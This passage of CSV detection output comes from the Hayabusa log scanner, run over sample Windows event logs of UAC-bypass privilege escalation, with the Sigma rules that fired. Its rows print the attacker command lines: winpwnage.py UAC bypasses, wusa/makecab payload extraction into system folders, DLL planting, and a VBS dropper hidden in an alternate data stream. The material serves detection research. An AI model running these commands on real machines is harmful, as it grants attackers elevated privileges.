C:\Windows\System32\eventvwr.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13982 | PID: 3752 | PGUID: 365ABB72-8980-5CD3-0000-0010972D1F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx 2019-05-09 10:59:28.950 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x1394a | PID: 3884 | PGUID: 365ABB72-8980-5CD3-0000-00105F451F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx 2019-05-09 10:59:29.090 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | Process: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\eventvwr.exe"" | LID: 0x1394a | PID: 3840 | PGUID: 365ABB72-8980-5CD3-0000-0010134D1F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx 2019-05-09 10:59:29.090 +09:00,IEWIN7,1,critical,Evas | PrivEsc,UAC Bypass via Event Viewer,,rules/sigma/process_creation/proc_creation_win_sysmon_uac_bypass_eventvwr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx 2019-05-09 10:59:29.090 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx 2019-05-09 11:00:01.794 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\wsqmcons.exe | Process: C:\Windows\System32\wsqmcons.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 272 | PGUID: 365ABB72-89A1-5CD3-0000-001013732100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx 2019-05-09 11:07:51.131 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" /kickoffelev | Process: C:\Windows\System32\sdclt.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13982 | PID: 3836 | PGUID: 365ABB72-8B77-5CD3-0000-0010E8FD2900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx 2019-05-09 11:07:51.131 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\sdclt.exe | Src User: %SourceUser% | Tgt User: 
%TargetUser% | Access: 0x1fffff | Src PID: 2704 | Src PGUID: 365ABB72-88DC-5CD3-0000-00100DA51A00 | Tgt PID: 3836 | Tgt PGUID: 365ABB72-8B77-5CD3-0000-0010E8FD2900,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx 2019-05-09 11:07:56.149 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\sdclt.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 2704 | Src PGUID: 365ABB72-88DC-5CD3-0000-00100DA51A00 | Tgt PID: 3836 | Tgt PGUID: 365ABB72-8B77-5CD3-0000-0010E8FD2900,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx 2019-05-09 11:08:00.446 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ? 
| LID: 0x1394a | PID: 2264 | PGUID: 365ABB72-8B80-5CD3-0000-001065512A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx 2019-05-09 11:08:00.446 +09:00,IEWIN7,1,medium,PrivEsc,Sdclt Child Processes,,rules/sigma/process_creation/proc_creation_win_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx 2019-05-09 11:52:18.765 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 1900 | PGUID: 365ABB72-9570-5CD3-0000-00103FC90A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 11:52:18.844 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 1292 | PGUID: 365ABB72-95E2-5CD3-0000-001097410F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 11:52:18.922 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3636 | PGUID: 365ABB72-95E2-5CD3-0000-0010C6440F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 11:52:18.953 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" 
""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3620 | PGUID: 365ABB72-95E2-5CD3-0000-001083470F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 11:52:18.969 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2420 | PGUID: 365ABB72-95E2-5CD3-0000-001074490F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 11:52:19.250 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13aa4 | PID: 3536 | PGUID: 365ABB72-95E3-5CD3-0000-00100C650F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 11:52:21.250 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" C:\Windows\System32\wscript.exe C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3828 | PGUID: 365ABB72-95E5-5CD3-0000-00101F720F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 11:52:21.265 +09:00,IEWIN7,1,info,,Process Created,"Cmd: 
""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3824 | PGUID: 365ABB72-95E5-5CD3-0000-00108F720F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 11:52:21.281 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2852 | PGUID: 365ABB72-95E5-5CD3-0000-001065730F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 11:52:21.297 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2364 | PGUID: 365ABB72-95E5-5CD3-0000-001033750F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 11:52:21.594 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13aa4 | PID: 2800 | PGUID: 365ABB72-95E5-5CD3-0000-0010E1890F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 11:52:23.500 +09:00,IEWIN7,11,info,,File Created,Path: 
C:\Users\IEUser\AppData:tghjx5xz2ky.vbs | Process: C:\Windows\system32\cmd.exe | PID: 2812 | PGUID: 365ABB72-95E7-5CD3-0000-001046950F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 11:52:23.500 +09:00,IEWIN7,15,info,,Alternate Data Stream Created,Path: C:\Users\IEUser\AppData | Process: C:\Windows\system32\cmd.exe | PID: 2812 | PGUID: 365ABB72-95E7-5CD3-0000-001046950F00 | Hash: Unknown,rules/hayabusa/sysmon/events/15_AlternateDataStreamCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 11:52:23.500 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /C ""echo Dim objShell:Dim oFso:Set oFso = CreateObject(""Scripting.FileSystemObject""):Set objShell = WScript.CreateObject(""WScript.Shell""):command = ""powershell.exe"":objShell.Run command, 0:command = ""C:\Windows\System32\cmd.exe /c """"start /b """""""" cmd /c """"timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest"""""""""":objShell.Run command, 0:Set objShell = Nothing > ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2812 | PGUID: 365ABB72-95E7-5CD3-0000-001046950F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 11:52:23.500 +09:00,IEWIN7,1,low,Evas,Cmd Stream Redirection,,rules/sigma/process_creation/proc_creation_win_redirect_to_stream.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 11:52:23.500 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 11:52:23.531 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /C ""C:\Windows\wscript.exe ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3784 | PGUID: 365ABB72-95E7-5CD3-0000-001004970F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 12:25:24.896 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" | Process: C:\Windows\System32\sdclt.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3184 | PGUID: 365ABB72-9DA4-5CD3-0000-00102E692F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx 2019-05-09 12:25:25.067 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /name Microsoft.BackupAndRestoreCenter | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\sdclt.exe"" | LID: 0x13add | PID: 2920 | PGUID: 365ABB72-9DA4-5CD3-0000-00107F7A2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx 2019-05-09 12:25:25.067 +09:00,IEWIN7,1,medium,PrivEsc,Sdclt Child Processes,,rules/sigma/process_creation/proc_creation_win_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx 2019-05-10 21:21:57.077 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 7 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a4f | PID: 4076 | PGUID: 
365ABB72-6CE5-5CD5-0000-00104BC61B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx 2019-05-10 21:22:02.434 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe | Process: c:\python27\python.exe | PID: 4076 | PGUID: 365ABB72-6CE5-5CD5-0000-00104BC61B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx 2019-05-10 21:22:08.465 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\users\ieuser\appdata\local\temp\system32\mmc.exe"" ""c:\users\ieuser\appdata\local\temp\system32\perfmon.msc"" | Process: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\perfmon.exe"" | LID: 0x13a11 | PID: 1644 | PGUID: 365ABB72-6CF0-5CD5-0000-0010140F1C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx 2019-05-10 21:22:08.465 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx 2019-05-10 22:32:48.200 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 9 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14241 | PID: 2796 | PGUID: 365ABB72-7D80-5CD5-0000-00100AD01300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx 2019-05-10 22:32:48.412 +09:00,IEWIN7,13,high,Persis,Bypass UAC Using Event 
Viewer,,rules/sigma/registry_event/win_re_bypass_uac_using_eventviewer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx 2019-05-10 22:32:58.549 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\CompMgmtLauncher.exe"" | LID: 0x141f8 | PID: 2076 | PGUID: 365ABB72-7D86-5CD5-0000-0010CC2E1400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx 2019-05-10 22:33:29.424 +09:00,IEWIN7,1,info,,Process Created,"Cmd: whoami /priv | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""c:\Windows\System32\cmd.exe"" | LID: 0x141f8 | PID: 2524 | PGUID: 365ABB72-7DA9-5CD5-0000-00100ED31400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx 2019-05-10 22:33:29.424 +09:00,IEWIN7,1,high,PrivEsc | Disc,Run Whoami Showing Privileges,,rules/sigma/process_creation/proc_creation_win_whoami_priv.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx 2019-05-10 22:33:29.424 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx 2019-05-10 22:33:29.424 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx 2019-05-10 22:49:29.586 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: 
C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14241 | PID: 3552 | PGUID: 365ABB72-8169-5CD5-0000-0010D7982300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx 2019-05-10 22:49:29.789 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\NTWDBLIB.dll | Process: c:\python27\python.exe | PID: 3552 | PGUID: 365ABB72-8169-5CD5-0000-0010D7982300,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx 2019-05-10 22:49:29.789 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx 2019-05-10 22:49:34.946 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 1700 | PGUID: 365ABB72-816E-5CD5-0000-0010FEB62300,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx 2019-05-10 22:49:39.930 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x14241 | PID: 3608 | PGUID: 365ABB72-8173-5CD5-0000-00102FCD2300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx 2019-05-10 22:49:40.164 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" 
c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x141f8 | PID: 2676 | PGUID: 365ABB72-8174-5CD5-0000-0010ABE62300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx 2019-05-10 22:49:45.133 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cliconfg.exe"" | Process: C:\Windows\System32\cliconfg.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x14241 | PID: 1052 | PGUID: 365ABB72-8179-5CD5-0000-00102CFF2300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx 2019-05-10 22:49:45.378 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cliconfg.exe"" | Process: C:\Windows\System32\cliconfg.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x141f8 | PID: 880 | PGUID: 365ABB72-8179-5CD5-0000-001083182400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx 2019-05-11 18:50:08.248 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x136c5 | PID: 1136 | PGUID: 365ABB72-9AD0-5CD6-0000-001077FC1600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx 2019-05-11 18:50:08.491 +09:00,IEWIN7,11,info,,File Created,Path: 
C:\Users\IEUser\AppData\Local\Temp\CRYPTBASE.dll | Process: c:\python27\python.exe | PID: 1136 | PGUID: 365ABB72-9AD0-5CD6-0000-001077FC1600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx 2019-05-11 18:50:08.491 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx 2019-05-11 18:50:13.494 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x136c5 | PID: 3716 | PGUID: 365ABB72-9AD5-5CD6-0000-0010C4131700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx 2019-05-11 18:50:13.509 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 3716 | PGUID: 365ABB72-9AD5-5CD6-0000-0010C4131700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx 2019-05-11 18:50:18.404 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x136c5 | PID: 2780 | PGUID: 365ABB72-9ADA-5CD6-0000-001012231700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx 2019-05-11 18:50:18.654 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1369b | PID: 3448 | PGUID: 365ABB72-9ADA-5CD6-0000-0010603C1700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx 2019-05-11 18:50:26.779 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\ehome\mcx2prov.exe"" | Process: C:\Windows\ehome\Mcx2Prov.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll 